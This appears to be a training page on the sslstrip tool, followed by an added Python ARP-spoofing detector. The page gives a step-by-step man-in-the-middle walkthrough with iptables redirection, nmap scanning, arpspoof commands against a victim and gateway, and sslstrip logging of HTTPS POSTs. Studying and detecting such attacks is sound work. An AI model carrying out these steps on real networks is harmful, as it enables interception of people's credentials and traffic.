SSLStrip

Description

sslstrip is a tool that transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, and then maps those links into look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.

Usage

Syntax

sslstrip <options>

Options

-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port>        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

Example

Enable IP Forwarding

To allow traffic to flow through our machine, IP forwarding needs to be enabled. Open a terminal and run the following commands:

cyborg@cyborg:~$ sudo -s
[sudo] password for cyborg: 


root@cyborg:~# echo '1' > /proc/sys/net/ipv4/ip_forward

Add an iptables Rule to Redirect Traffic to SSLStrip

This adds an iptables rule so that our machine knows how to handle incoming traffic from the victim. The following rule takes any traffic originally destined for port 80 (HTTP, web traffic) and redirects it to port 8080, the port SSLStrip will be running on.

root@cyborg:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Identify Target and Gateway IP Addresses

root@cyborg:~# nmap -sP -T4 192.168.1.1/24

ARP Spoofing

This is where the meat of the attack takes place. Address Resolution Protocol, or ARP, is what is responsible for mapping IP addresses to MAC addresses. These mappings are stored in an ARP table on each machine connected to the network.

The ARP spoofing attack sends out false information to the machine you’re attacking, repeatedly telling it that the gateway IP address has changed. The IP address we give it is that of your machine. So now the victim thinks that you are the gateway, and will send all of its outgoing traffic to you!

We also need to ARP spoof the gateway, to make it think that you are the victim’s machine. By carrying out this attack, you essentially become the Man In The Middle.

To ARP Spoof the victim:

arpspoof -i <interface> -t <target IP> <gateway IP>

root@cyborg:~# arpspoof -i eth0 -t 192.168.1.18 192.168.1.1
0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93
0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93

To ARP Spoof the gateway router:

arpspoof -i <interface> -t <gateway IP> <target IP>

root@cyborg:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.18
0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93
0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93 

Run these commands in their own separate terminal tabs so that you can flick between them and monitor each one.

Running SSLStrip

root@cyborg:~# sslstrip -k -l 8080

sslstrip 0.9 by Moxie Marlinspike running...
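
Seen from the defending side, the arpspoof output above is also the detection signal: a single MAC address answers for both the gateway and the victim. The following added example (not part of the original page, nor code from sslstrip or arpspoof) parses reply lines in that format and checks them against a trusted IP-to-MAC table; the function names, the trusted table and the first sample line are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Reply lines as arpspoof prints them: "<src> <dst> 0806 42: arp reply <ip> is-at <mac>"
ARP_REPLY = re.compile(
    r"^(?P<src>[0-9a-f:]+)\s+(?P<dst>[0-9a-f:]+)\s+0806\s+\d+:\s+"
    r"arp reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]+)$",
    re.IGNORECASE,
)

def norm_mac(mac):
    """Normalise '0:e0:4c:37:0:93' and '00:E0:4C:37:00:93' to the same string."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def find_arp_spoofing(lines, trusted):
    """Return sorted alerts for replies that contradict the trusted IP->MAC
    table and for MAC addresses that claim more than one IP address."""
    trusted = {ip: norm_mac(mac) for ip, mac in trusted.items()}
    claimed = defaultdict(set)  # MAC -> set of IPs it has claimed
    alerts = set()              # a set, so repeated replies alert only once
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if not m:
            continue  # not an ARP reply line
        ip, mac = m["ip"], norm_mac(m["mac"])
        claimed[mac].add(ip)
        if ip in trusted and trusted[ip] != mac:
            alerts.add(f"{ip} claimed by {mac}, expected {trusted[ip]}")
    for mac, ips in claimed.items():
        if len(ips) > 1:
            alerts.add(f"{mac} claims multiple IPs: {', '.join(sorted(ips))}")
    return sorted(alerts)

# Assumption: table recorded while the network was known-good. The MACs are the
# destination addresses visible in the arpspoof output on this page.
TRUSTED = {"192.168.1.1": "0:26:15:67:e6:c3", "192.168.1.18": "18:67:b0:27:e5:15"}

SAMPLE = [
    # constructed: a genuine reply sent by the gateway itself
    "0:26:15:67:e6:c3 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:26:15:67:e6:c3",
    # the forged replies as they appear in the arpspoof output on this page
    "0:e0:4c:37:0:93 18:67:b0:27:e5:15 0806 42: arp reply 192.168.1.1 is-at 0:e0:4c:37:0:93",
    "0:e0:4c:37:0:93 0:26:15:67:e6:c3 0806 42: arp reply 192.168.1.18 is-at 0:e0:4c:37:0:93",
]

if __name__ == "__main__":
    for alert in find_arp_spoofing(SAMPLE, TRUSTED):
        print("ALERT:", alert)
```
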
©2017 Ztrela Knowledge Solutions Pvt. Ltd